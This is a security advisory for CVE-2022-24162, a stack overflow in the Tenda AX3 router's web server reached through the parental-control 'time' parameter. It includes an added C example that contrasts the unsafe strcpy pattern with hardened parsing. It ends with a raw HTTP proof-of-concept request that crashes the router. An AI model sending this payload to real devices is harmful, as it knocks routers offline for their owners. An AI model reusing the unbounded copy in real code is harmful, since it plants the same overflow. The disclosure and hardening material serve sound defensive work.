CVE-2022-24162: my_vuln/27.md at main · pjqwudi/my_vuln
Tenda AX3 v16.03.12.10_CN was discovered to contain a stack overflow in the function saveParentControlInfo. This vulnerability allows attackers to cause a Denial of Service (DoS) via the time parameter.
Tenda Vulnerability
Vendor: Tenda
Product: AX3
Version: V16.03.12.10_CN (Download Link: https://www.tenda.com.cn/download/detail-3238.html)
Type: Stack Overflow & Heap Overflow
Author: Jiaqian Peng
Institution: [email protected]
Vulnerability description
We found a stack overflow and a heap overflow in the httpd binary of a recently released Tenda AX3 firmware. Both allow a remote attacker to crash the router's web server.
Stack Overflow & Heap Overflow
In the httpd binary, the saveParentControlInfo function reads the time parameter directly from the attacker-supplied request, and the input is never checked: neither its length nor its format is validated before use. The value is then handed to the compare_parentcontrol_time function, which copies the time parameter straight into a local buffer on the stack. If the value is longer than that buffer, the copy runs past it and overwrites the saved return address of the function, a classic stack-based buffer overflow. Because the attacker controls every byte of time, this is not limited to a crash: an attacker who controls the overwritten return address could redirect execution. The PoC below only demonstrates the denial of service.
Supplement
To avoid this class of bug, the length and format of the string should be checked at the point where it is extracted from the request, before it is copied into any fixed-size buffer.
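As an added illustration (this is constructed example code, not code from the advisory or from Tenda's firmware), the C snippet below places the unsafe pattern the advisory describes next to a hardened extraction path: the form parameter is percent-decoded into a bounded buffer and rejected if it would not fit, then validated as exactly HH:MM-HH:MM before anything else uses it. The function names, buffer sizes, the assumed HH:MM-HH:MM field format and the sample request bodies are assumptions for the example; the advisory does not document the firmware's actual field format.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed format of a valid time value: "HH:MM-HH:MM" is exactly 11 chars. */
#define TIME_LEN 11

struct time_range {
    int start_min;   /* minutes since midnight */
    int end_min;
};

/* The pattern the advisory describes (constructed, not Tenda's code): the
 * attacker-controlled value is copied into a fixed stack buffer with no length
 * check, so an over-long 'time' runs past buf and overwrites the saved return
 * address. Shown for contrast only; never call it with untrusted input. */
void vulnerable_time_copy(const char *time)
{
    char buf[32];
    strcpy(buf, time);   /* unbounded copy: stack overflow on long input */
    (void)buf;
}

static int hexval(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Locate `name=` in an x-www-form-urlencoded body and percent-decode its value
 * into out (capacity outsz). Returns the decoded length, or -1 if the parameter
 * is missing, has a malformed escape, or would not fit. The length check lives
 * here, at extraction time, so no fixed-size buffer ever sees an oversized value. */
int get_form_param(const char *body, const char *name, char *out, size_t outsz)
{
    size_t nlen = strlen(name);
    const char *p = body;
    while (p && *p) {
        if (strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            const char *v = p + nlen + 1;
            size_t o = 0;
            while (*v && *v != '&') {
                if (o + 1 >= outsz) return -1;          /* would overflow: reject */
                if (*v == '%') {
                    int hi = hexval(v[1]);
                    int lo = (hi >= 0) ? hexval(v[2]) : -1;
                    if (lo < 0) return -1;              /* malformed %XX escape */
                    out[o++] = (char)(hi * 16 + lo);
                    v += 3;
                } else if (*v == '+') {
                    out[o++] = ' ';
                    v++;
                } else {
                    out[o++] = *v++;
                }
            }
            out[o] = '\0';
            return (int)o;
        }
        p = strchr(p, '&');             /* skip to the next key=value pair */
        if (p) p++;
    }
    return -1;
}

static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0') n++;
    return n;
}

/* Parse "HH:MM" at s into minutes; reject non-digits and out-of-range values. */
static int parse_hhmm(const char *s, int *minutes)
{
    if (!isdigit((unsigned char)s[0]) || !isdigit((unsigned char)s[1]) || s[2] != ':' ||
        !isdigit((unsigned char)s[3]) || !isdigit((unsigned char)s[4]))
        return -1;
    int h = (s[0] - '0') * 10 + (s[1] - '0');
    int m = (s[3] - '0') * 10 + (s[4] - '0');
    if (h > 23 || m > 59) return -1;
    *minutes = h * 60 + m;
    return 0;
}

/* Strict validation of an already-decoded time value: exactly "HH:MM-HH:MM". */
int parse_time_range(const char *time, struct time_range *out)
{
    if (bounded_len(time, TIME_LEN + 1) != TIME_LEN || time[5] != '-') return -1;
    int s, e;
    if (parse_hhmm(time, &s) != 0 || parse_hhmm(time + 6, &e) != 0) return -1;
    out->start_min = s;
    out->end_min = e;
    return 0;
}

/* Extract and validate in one step: 0 = accepted, -1 = rejected. */
int handle_time_param(const char *body, struct time_range *out)
{
    char time[TIME_LEN + 1];
    if (get_form_param(body, "time", time, sizeof time) < 0) return -1;
    return parse_time_range(time, out);
}

int main(void)
{
    /* Constructed bodies: a benign request and one shaped like the PoC. */
    const char *good = "deviceName=test&enable=1&time=19%3A00-21%3A30&url_enable=1";
    const char *bad  = "deviceName=test&enable=1&time=19%3A00-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&url_enable=1";
    struct time_range r;
    printf("benign request: %s\n", handle_time_param(good, &r) == 0 ? "accepted" : "rejected");
    printf("PoC-style request: %s\n", handle_time_param(bad, &r) == 0 ? "accepted" : "rejected");
    return 0;
}
```

The key design point is that rejection happens in get_form_param, before the value is ever placed in a fixed-size buffer; parse_time_range then enforces the exact format, so a value that is short enough but malformed (for example an hour of 25) is also refused rather than passed on to later logic.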
There is also a heap overflow in the function get_parentControl_list_Info, which contains several further overflow bugs of the same kind.
PoC
We set time to 19%3A00-aaaaaaaaaaaaaaaaaaaaaaaaaaaa… and the router crashes. The request used:

```http
POST /goform/saveParentControlInfo HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 273
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/parental_control.html?random=0.12030911103673769&
Cookie: password=f5bb0c8de146c67b44babbf4e6584cc0ibccvb

deviceId=00%3A0c%3A29%3A32%3Aa0%3A89&deviceName=pjquwdi&enable=1&time=19%3A00-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&url_enable=1&urls=www.baidu.com&day=1%2C1%2C1%2C1%2C1%2C1%2C1&limit_type=0
```
Result
The target router crashes and can no longer provide service; the httpd process does not recover on its own.